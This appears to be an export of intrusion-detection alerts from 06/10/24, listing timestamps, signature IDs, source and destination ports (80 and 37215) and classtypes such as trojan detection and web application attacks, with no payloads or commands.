              Timestamp:06/10/24-15:37:59.795427
              SID:2025883
              Source Port:37488
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.031359
              SID:2835222
              Source Port:52142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.215874
              SID:2030092
              Source Port:35478
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.800000
              SID:2025883
              Source Port:42016
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.133538
              SID:2835222
              Source Port:35252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.656081
              SID:2835222
              Source Port:38930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.757283
              SID:2835222
              Source Port:44434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.831568
              SID:2025883
              Source Port:53462
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.263838
              SID:2030092
              Source Port:50566
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.685061
              SID:2835222
              Source Port:51404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.176046
              SID:2835222
              Source Port:41532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.827151
              SID:2030092
              Source Port:51382
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.934919
              SID:2835222
              Source Port:56378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.014911
              SID:2835222
              Source Port:38984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.218890
              SID:2835222
              Source Port:47364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.213967
              SID:2829579
              Source Port:58106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.258958
              SID:2030092
              Source Port:36798
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.735960
              SID:2829579
              Source Port:47608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.989479
              SID:2835222
              Source Port:58502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.027008
              SID:2835222
              Source Port:42370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.858288
              SID:2829579
              Source Port:49962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.923381
              SID:2829579
              Source Port:60882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.169848
              SID:2835222
              Source Port:55296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.018435
              SID:2829579
              Source Port:35452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.216669
              SID:2030092
              Source Port:51386
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.993727
              SID:2829579
              Source Port:53342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.876052
              SID:2835222
              Source Port:47002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.804169
              SID:2829579
              Source Port:41386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.186850
              SID:2835222
              Source Port:33396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.217260
              SID:2829579
              Source Port:41384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.852405
              SID:2835222
              Source Port:34956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.131221
              SID:2829579
              Source Port:48102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.815835
              SID:2030092
              Source Port:53776
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.268899
              SID:2835222
              Source Port:36416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.727944
              SID:2829579
              Source Port:44684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.864253
              SID:2835222
              Source Port:47112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.774510
              SID:2025883
              Source Port:54128
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.209224
              SID:2030092
              Source Port:39220
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.667443
              SID:2835222
              Source Port:56504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.026295
              SID:2835222
              Source Port:43020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.789775
              SID:2829579
              Source Port:51240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.844763
              SID:2829579
              Source Port:55898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.039203
              SID:2835222
              Source Port:46642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.722392
              SID:2829579
              Source Port:52368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.158562
              SID:2030092
              Source Port:50270
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.671087
              SID:2835222
              Source Port:45274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.842261
              SID:2829579
              Source Port:59676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.208033
              SID:2030092
              Source Port:44384
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.750933
              SID:2030092
              Source Port:35674
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.779104
              SID:2025883
              Source Port:59220
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.811339
              SID:2025883
              Source Port:54380
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.192522
              SID:2835222
              Source Port:48172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.201993
              SID:2829579
              Source Port:34464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.094682
              SID:2030092
              Source Port:41156
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.749574
              SID:2829579
              Source Port:45224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.160015
              SID:2835222
              Source Port:44468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.172951
              SID:2835222
              Source Port:57678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.251690
              SID:2829579
              Source Port:51740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.036323
              SID:2835222
              Source Port:50702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.144369
              SID:2030092
              Source Port:48144
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.947535
              SID:2829579
              Source Port:39894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.139383
              SID:2030092
              Source Port:35604
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.916548
              SID:2829579
              Source Port:50156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.184257
              SID:2030092
              Source Port:54180
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.873305
              SID:2829579
              Source Port:55624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.758232
              SID:2030092
              Source Port:43434
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.976497
              SID:2829579
              Source Port:34932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.511176
              SID:2829579
              Source Port:56274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.845835
              SID:2829579
              Source Port:58594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.198032
              SID:2835222
              Source Port:54544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.852064
              SID:2025883
              Source Port:45994
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.228570
              SID:2829579
              Source Port:54124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.274773
              SID:2835222
              Source Port:34678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.748143
              SID:2829579
              Source Port:48954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.856619
              SID:2030092
              Source Port:43560
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.232831
              SID:2835222
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.986004
              SID:2829579
              Source Port:53016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.146535
              SID:2030092
              Source Port:36400
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.840660
              SID:2030092
              Source Port:33900
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.818643
              SID:2829579
              Source Port:60054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.662261
              SID:2835222
              Source Port:49490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.505632
              SID:2829579
              Source Port:42276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.181411
              SID:2030092
              Source Port:35638
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.910934
              SID:2835222
              Source Port:47504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.733766
              SID:2829579
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.167791
              SID:2835222
              Source Port:59702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.960374
              SID:2829579
              Source Port:56034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.824955
              SID:2025883
              Source Port:48068
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.185349
              SID:2835222
              Source Port:60220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.009869
              SID:2829579
              Source Port:32966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.511832
              SID:2835222
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.710308
              SID:2835222
              Source Port:50128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.499468
              SID:2829579
              Source Port:51642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.946836
              SID:2829579
              Source Port:53482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.873252
              SID:2030092
              Source Port:52736
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.718331
              SID:2829579
              Source Port:51422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.743038
              SID:2829579
              Source Port:56570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.809845
              SID:2829579
              Source Port:54624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.820455
              SID:2030092
              Source Port:48502
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.209869
              SID:2025883
              Source Port:40614
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.675728
              SID:2829579
              Source Port:33814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.180724
              SID:2829579
              Source Port:45616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.765229
              SID:2025883
              Source Port:45956
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.241407
              SID:2829579
              Source Port:49198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.783251
              SID:2829579
              Source Port:39562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.686166
              SID:2835222
              Source Port:42686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.083314
              SID:2030092
              Source Port:35834
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.752803
              SID:2835222
              Source Port:57264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.253813
              SID:2829579
              Source Port:43078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.256609
              SID:2829579
              Source Port:32906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.254476
              SID:2835222
              Source Port:36058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.249310
              SID:2030092
              Source Port:49594
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.101239
              SID:2030092
              Source Port:60594
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.922412
              SID:2835222
              Source Port:49110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.968821
              SID:2835222
              Source Port:45692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.783784
              SID:2025883
              Source Port:39218
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.770031
              SID:2835222
              Source Port:35782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.875172
              SID:2829579
              Source Port:45636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.934901
              SID:2829579
              Source Port:34102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.787074
              SID:2829579
              Source Port:56392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.006377
              SID:2829579
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.242237
              SID:2835222
              Source Port:45198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.512532
              SID:2835222
              Source Port:34816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.231111
              SID:2030092
              Source Port:41688
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.236295
              SID:2829579
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.027699
              SID:2829579
              Source Port:55096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.224313
              SID:2030092
              Source Port:41524
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.230506
              SID:2030092
              Source Port:42362
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.817519
              SID:2835222
              Source Port:60560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.753767
              SID:2835222
              Source Port:32970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.745716
              SID:2829579
              Source Port:45604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.823755
              SID:2829579
              Source Port:39666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.825900
              SID:2829579
              Source Port:56588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.096206
              SID:2025883
              Source Port:35516
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.220635
              SID:2835222
              Source Port:34654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.487616
              SID:2829579
              Source Port:38160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.822383
              SID:2829579
              Source Port:44278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.760581
              SID:2030092
              Source Port:35872
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.767730
              SID:2835222
              Source Port:59890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.114191
              SID:2030092
              Source Port:59022
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.926997
              SID:2835222
              Source Port:42424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.786107
              SID:2030092
              Source Port:40246
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.681567
              SID:2835222
              Source Port:35328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.847965
              SID:2835222
              Source Port:46436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.159854
              SID:2030092
              Source Port:46328
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.998646
              SID:2829579
              Source Port:59662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.920636
              SID:2829579
              Source Port:57886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.764373
              SID:2835222
              Source Port:43254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.229452
              SID:2829579
              Source Port:52390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.835522
              SID:2829579
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.034890
              SID:2835222
              Source Port:34742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.784346
              SID:2835222
              Source Port:39098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.967169
              SID:2829579
              Source Port:36602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.982567
              SID:2829579
              Source Port:60620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.682611
              SID:2829579
              Source Port:53394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.793177
              SID:2030092
              Source Port:52842
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.179963
              SID:2829579
              Source Port:44542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.919148
              SID:2829579
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.924570
              SID:2829579
              Source Port:57234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.225874
              SID:2829579
              Source Port:60486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.038461
              SID:2835222
              Source Port:51092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.264605
              SID:2829579
              Source Port:48610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.088585
              SID:2030092
              Source Port:42532
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.246351
              SID:2829579
              Source Port:41150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.805331
              SID:2835222
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.824797
              SID:2829579
              Source Port:49450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.939523
              SID:2835222
              Source Port:56768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.940258
              SID:2835222
              Source Port:49626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.953764
              SID:2835222
              Source Port:58684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.204323
              SID:2835222
              Source Port:45564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.235344
              SID:2829579
              Source Port:51868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.166755
              SID:2835222
              Source Port:34632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.272286
              SID:2829579
              Source Port:38538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.703161
              SID:2835222
              Source Port:45526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.190865
              SID:2829579
              Source Port:32862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.250990
              SID:2829579
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.773931
              SID:2835222
              Source Port:60466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.867036
              SID:2829579
              Source Port:52678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.766582
              SID:2829579
              Source Port:52936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.928827
              SID:2829579
              Source Port:45682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.729371
              SID:2835222
              Source Port:60038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.707896
              SID:2829579
              Source Port:52190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.854671
              SID:2835222
              Source Port:60760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.185065
              SID:2030092
              Source Port:34914
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.705525
              SID:2835222
              Source Port:49644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.093773
              SID:2030092
              Source Port:48928
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.698008
              SID:2829579
              Source Port:42586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.132023
              SID:2835222
              Source Port:43292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.758344
              SID:2829579
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.121056
              SID:2030092
              Source Port:34212
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.249566
              SID:2835222
              Source Port:49874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.145053
              SID:2030092
              Source Port:35910
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.762083
              SID:2835222
              Source Port:59392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.911966
              SID:2829579
              Source Port:33880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.034176
              SID:2829579
              Source Port:36348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.248812
              SID:2829579
              Source Port:33070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.716092
              SID:2829579
              Source Port:42970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.506272
              SID:2829579
              Source Port:32782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.721224
              SID:2835222
              Source Port:38284
              Destination Port:37215
